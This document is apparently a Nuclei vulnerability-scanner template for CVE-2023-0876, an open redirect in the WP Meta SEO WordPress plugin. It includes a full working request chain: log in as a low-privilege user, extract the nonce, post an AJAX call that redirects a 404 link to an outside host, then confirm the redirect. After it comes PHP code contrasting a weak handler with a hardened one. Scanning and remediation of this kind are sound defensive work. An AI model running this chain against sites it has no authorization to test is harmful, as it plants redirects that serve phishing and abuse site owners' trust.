Vulnerability description
The WP Meta SEO WordPress plugin before 4.5.3 did not authorize several AJAX actions, which allowed low-privilege users to update certain data and resulted in an arbitrary redirect vulnerability.
id: CVE-2023-0876

info:
  name: WordPress Meta SEO <= 4.5.2 - Open Redirect
  author: Khalid6468
  severity: medium
  description: |
    The WP Meta SEO WordPress plugin before 4.5.3 did not authorize several AJAX actions, which allowed low-privilege users to update certain data and resulted in an arbitrary redirect vulnerability.
  remediation: |
    Update the plugin to version 4.5.3 or later to fix the arbitrary redirect vulnerability.
  reference:
    - https://wpscan.com/vulnerability/1a8c97f9-98fa-4e29-b7f7-bb9abe0c42ea/
    - https://api.first.org/data/v1/epss?cve=CVE-2023-0876&pretty=true
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-0876
    cwe-id: CWE-601
    epss-score: 0.06603
    epss-percentile: 0.90817
    cpe: cpe:2.3:a:joomunited:wp_meta_seo:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    fofa-query: body="/wp-content/plugins/wp-meta-seo/"
    vendor: joomunited
    product: wp_meta_seo
    framework: wordpress
  tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,wp-meta-seo,redirect

variables:
  link_endpoint: "{{rand_text_numeric(5)}}"
  redirect_url: "https://oast.me"

flow: http(1) || http(2) && http(3) && http(4) && http(5) && http(6)

http:
  - raw:
      - |
        GET /wp-content/plugins/wp-meta-seo/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - compare_versions(version, '<= 4.5.2')
        condition: and

    extractors:
      - type: regex
        part: body
        name: version
        group: 1
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  - raw:
      - |
        GET /?p={{link_endpoint}} HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - "status_code == 404"
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302 || status_code == 200'
          - 'contains(header, "wordpress_logged_in")'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, 'wpms_nonce')"
        condition: and
        internal: true

    extractors:
      - type: regex
        name: wpms_nonce
        group: 1
        regex:
          - 'wpms_nonce.*?([0-9a-z]+)'
        part: body
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=wpms&wpms_nonce={{wpms_nonce}}&task=update_link_redirect&link_id={{link_id}}&link_redirect={{redirect_url}}

    # The WP Meta SEO plugin automatically created entries in the wp_wpms_links table for 404 pages, with the link_id field stored in this DB table. This link_id input was required to validate the redirection.
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_any(body, 'status', 'contains','success', 'updated','redirect')"
        condition: and
        internal: true

  - raw:
      - |
        GET /?p={{link_endpoint}} HTTP/1.1
        Host: {{Hostname}}

    redirects: false
    max-redirects: 0
    matchers:
      - type: dsl
        dsl:
          - "status_code == 302"
          - 'contains(header, "Location: {{redirect_url}}")'
        condition: and
# digest: 4b0a00483046022100d65515b2b11705fffc92df13a20942b01f2f0363f6dedb655eb4cd9cad44fb44022100c92c14234abea9d26ace3f4c90bfdeb1453bfecf52f95ef38fbfebe54a378a7b:922c64590222798bb761d5b6d8e72950
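The root cause named in the description is an AJAX task that any logged-in user can reach: the template above sends a valid `wpms_nonce`, which a subscriber can read from wp-admin, so the nonce alone does not stop the write. The handler below is an added illustration written for this page, not code from the WP Meta SEO plugin. It assumes a hypothetical callback for the `wpms` AJAX action (WordPress dispatches `action=wpms` to the `wp_ajax_wpms` hook), a `wp_wpms_links` table with `link_id` and `link_redirect` columns as named in the template comment, and the `manage_options` capability as the authorization bar; the function names and that capability choice are assumptions. The weak form checks only the nonce; the hardened form adds a capability check and constrains the redirect target to the site's own host or an allow-listed one.

```php
<?php
// Added illustration for this page, not the plugin's own code.
// Task name update_link_redirect, the wp_wpms_links table and the fields
// link_id / link_redirect come from the template above; the callback names
// and the manage_options capability are assumptions.

// WEAK: a nonce proves the request came from a page the user loaded, not that
// the user is allowed to perform the action. Any authenticated user who can
// open wp-admin can read wpms_nonce and therefore reach this code path, and
// the destination is stored without any check on where it points.
function wpms_update_link_redirect_weak() {
    global $wpdb;
    check_ajax_referer( 'wpms_nonce', 'wpms_nonce' );

    if ( isset( $_POST['task'] ) && 'update_link_redirect' === $_POST['task'] ) {
        $wpdb->update(
            $wpdb->prefix . 'wpms_links',
            array( 'link_redirect' => wp_unslash( $_POST['link_redirect'] ) ), // off-site target accepted as-is
            array( 'link_id'       => absint( $_POST['link_id'] ) ),
            array( '%s' ),
            array( '%d' )
        );
        wp_send_json_success( array( 'status' => 'updated' ) );
    }
    wp_send_json_error( 'unknown task' );
}

// HARDENED: authorization (capability) first, then CSRF (nonce), then input
// validation that keeps the redirect on-site or on an allow-listed host.
function wpms_update_link_redirect_hardened() {
    global $wpdb;

    // Authorization: only users who may manage the site may change redirects.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // CSRF protection: dies with 403 if the nonce is missing or invalid.
    check_ajax_referer( 'wpms_nonce', 'wpms_nonce' );

    $task = isset( $_POST['task'] ) ? sanitize_key( $_POST['task'] ) : '';
    if ( 'update_link_redirect' !== $task ) {
        wp_send_json_error( 'unknown task', 400 );
    }

    $link_id = isset( $_POST['link_id'] ) ? absint( $_POST['link_id'] ) : 0;
    $target  = isset( $_POST['link_redirect'] ) ? esc_url_raw( wp_unslash( $_POST['link_redirect'] ) ) : '';

    // wp_validate_redirect() returns the fallback when the host is neither the
    // site's own host nor one added through the allowed_redirect_hosts filter,
    // so a foreign destination collapses to the home URL and is rejected below.
    $safe_target = wp_validate_redirect( $target, home_url( '/' ) );

    if ( 0 === $link_id || '' === $target || $safe_target !== $target ) {
        wp_send_json_error( 'invalid link_id or off-site redirect target', 400 );
    }

    $updated = $wpdb->update(
        $wpdb->prefix . 'wpms_links',
        array( 'link_redirect' => $safe_target ),
        array( 'link_id'       => $link_id ),
        array( '%s' ),
        array( '%d' )
    );

    if ( false === $updated ) {
        wp_send_json_error( 'database error', 500 );
    }
    wp_send_json_success( array( 'status' => 'updated', 'link_id' => $link_id ) );
}

// Registering on wp_ajax_ (logged-in users only) does NOT restrict by role;
// the capability check inside the callback is what enforces authorization.
add_action( 'wp_ajax_wpms', 'wpms_update_link_redirect_hardened' );
```

The order in the hardened form matters for detection as well as prevention: a 403 from the capability check is logged by WordPress before any database write, so requests to `admin-ajax.php` with `task=update_link_redirect` from non-administrator accounts show up as rejected attempts rather than as silent data changes, and the redirect row can never hold a host outside the allow list regardless of who submits it.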